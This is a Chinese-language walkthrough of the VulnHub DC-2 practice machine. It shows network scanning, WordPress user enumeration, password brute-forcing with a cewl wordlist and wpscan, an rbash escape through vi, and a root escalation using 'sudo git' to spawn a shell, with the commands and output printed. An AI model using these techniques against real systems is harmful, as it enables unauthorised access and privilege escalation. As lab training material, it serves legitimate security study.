靶机练习 | DC:2 靶机渗透练习


环境准备

  • DC:2靶机
  • Kali linux

DC:2靶机

下载地址:

http://www.five86.com/dc-2.html
https://download.vulnhub.com/dc/DC-2.zip

涉及的知识点:

  • 工具:nmap,cewl,wpscan
  • git提权、rbash绕过

渗透流程

这里小结一下流程,下面再详述具体内容:

  • 通过修改hosts进入网站,发现flag1
  • 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2
  • 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3
  • 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4
  • 使用jerry用户通过git提权,进入root目录找到final_flag

主机发现

root@ptlab:~# arp-scan 10.2.2.0/24
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
10.2.2.1  52:54:00:12:35:00  QEMU
10.2.2.2  52:54:00:12:35:00  QEMU
10.2.2.3  08:00:27:9f:81:e7  Cadmus Computer Systems
10.2.2.7  08:00:27:69:46:72  Cadmus Computer Systems

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.045 seconds (125.18 hosts/sec). 4 responded

目标是10.2.2.7

端口扫描

root@ptlab:~# nmap -A -T4 -p- 10.2.2.7
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 16:24 CST
Nmap scan report for dc-2 (10.2.2.7)
Host is up (0.0015s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:69:46:72 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.49 ms dc-2 (10.2.2.7)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

目标开放了80端口和7744端口,7744端口上是ssh,80端口的web页面需要修改hosts才能访问

访问80端口

修改/etc/hosts添加如下行:

10.2.2.7    dc-2

即可成功访问Web页面

很明显,这是一个WordPress网站

发现flag1:

这里提示了cewl

扫描网站

对于WordPress网站,可以使用wp-scan进行扫描,扫描结果太长了,我就截取部分有用信息放出来:

root@ptlab:~# wpscan --url dc-2 -e
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.7.2
      WPScan.io - Online WordPress Vulnerability Scanner
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://dc-2/
[+] Started: Sun Oct  6 16:33:02 2019

Interesting Finding(s):

[+] http://dc-2/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured https://raw.githubusercontent.com/kn0sky/blog_img_resource/master/img-pt/2-dc-2. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Detected By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.

[+] Finished: Sun Oct  6 16:33:14 2019
[+] Requests Done: 3100
[+] Cached Requests: 9
[+] Data Sent: 721.859 KB
[+] Data Received: 1.017 MB
[+] Memory used: 156.598 MB
[+] Elapsed time: 00:00:12

这里我们枚举找到了3个已存在的账号:jerry,tom,admin 根据flag1的提示cewl去生成一个字典,去试试爆破密码

爆破密码

首先通过cewl生成一个字典1.txt:

root@ptlab:~/dc:2# cewl dc-2 -d 3 -m 2 -w 1.txt 
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

然后使用wpscan的密码爆破功能进行爆破操作,同样,输出结果太长了,就截取有用信息部分:

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                  
[SUCCESS] - tom / parturient                                                    
Trying admin / flag Time: 00:00:55 <========> (710 / 710) 100.00% Time: 00:00:55
Trying admin / log Time: 00:00:55 <=========> (710 / 710) 100.00% Time: 00:00:55

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

得到jerry和tom的密码

访问后台

得到账号密码之后,登录网站后台看看,在jerry的后台界面发现flag2

ssh登录

既然已经得到了2对账号密码,直接去试试ssh登录到主机吧 jerry的账号登录失败:

root@ptlab:~/dc:2# ssh dc-2 -p 7744 -l jerry
The authenticity of host '[dc-2]:7744 ([10.2.2.7]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[dc-2]:7744' (ECDSA) to the list of known hosts.
jerry@dc-2's password: 
Permission denied, please try again.

tom的账号可以登陆上:

root@ptlab:~/dc:2# ssh dc-2 -p 7744 -l tom
tom@dc-2's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct  5 02:20:39 2019 from 10.2.2.4
tom@DC-2:~$

tom的账号被rbash限制,只能使用ls,less,scp,vi四个命令 tom主目录下有flag3.txt,使用vi打开看看:

提示让我们切换到jerry的账号上

绕过rbash

tom账号遇到rbash限制,这时候就需要绕过rbash来进行操作 这里的vim允许我们设置shell变量,打开vim,使用命令模式键入如下命令:

:!set shell=/bin/sh

将shell设置为/bin/sh之后,启用shell:

:!shell

即可进入vi 的shell,这个时候,我们发现,cd命令可以使用了

切换到jerry用户

接下来我们切换到jerry用户

$ /bin/su jerry
Password: 
jerry@DC-2:/home$

jerry用户没那么多限制,在主目录下找到flag4:

jerry@DC-2:~$ ls
flag4.txt 
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

提示是git

利用git提权 查看jerry可使用sudo的权限

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

jerry可以root使用git命令

接下来利用git进入一个交互式窗口来执行命令实现提权

jerry@DC-2:~$ sudo git -p --help
usage: git [--version] [--help] [-C <path>] [-c name=value]
           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
           <command> [<args>]

The most commonly used git commands are:
   add        Add file contents to the index
   bisect     Find by binary search the change that introduced a bug
   branch     List, create, or delete branches
   checkout   Checkout a branch or paths to the working tree
   clone      Clone a repository into a new directory
   commit     Record changes to the repository
   diff       Show changes between commits, commit and working tree, etc
   fetch      Download objects and refs from another repository
   grep       Print lines matching a pattern
   init       Create an empty Git repository or reinitialize an existing one
   log        Show commit logs
   merge      Join two or more development histories together
   mv         Move or rename a file, a directory, or a symlink
   pull       Fetch from and integrate with another repository or a local branch
   push       Update remote refs along with associated objects
   rebase     Forward-port local commits to the updated upstream head
!/bin/sh
# whoami
root

这就得到root权限了

通关

/root目录下发现最终flag

# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

原文发布于微信公众号 - 小白帽学习之路(bat7089)

原文发表时间:2019-10-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券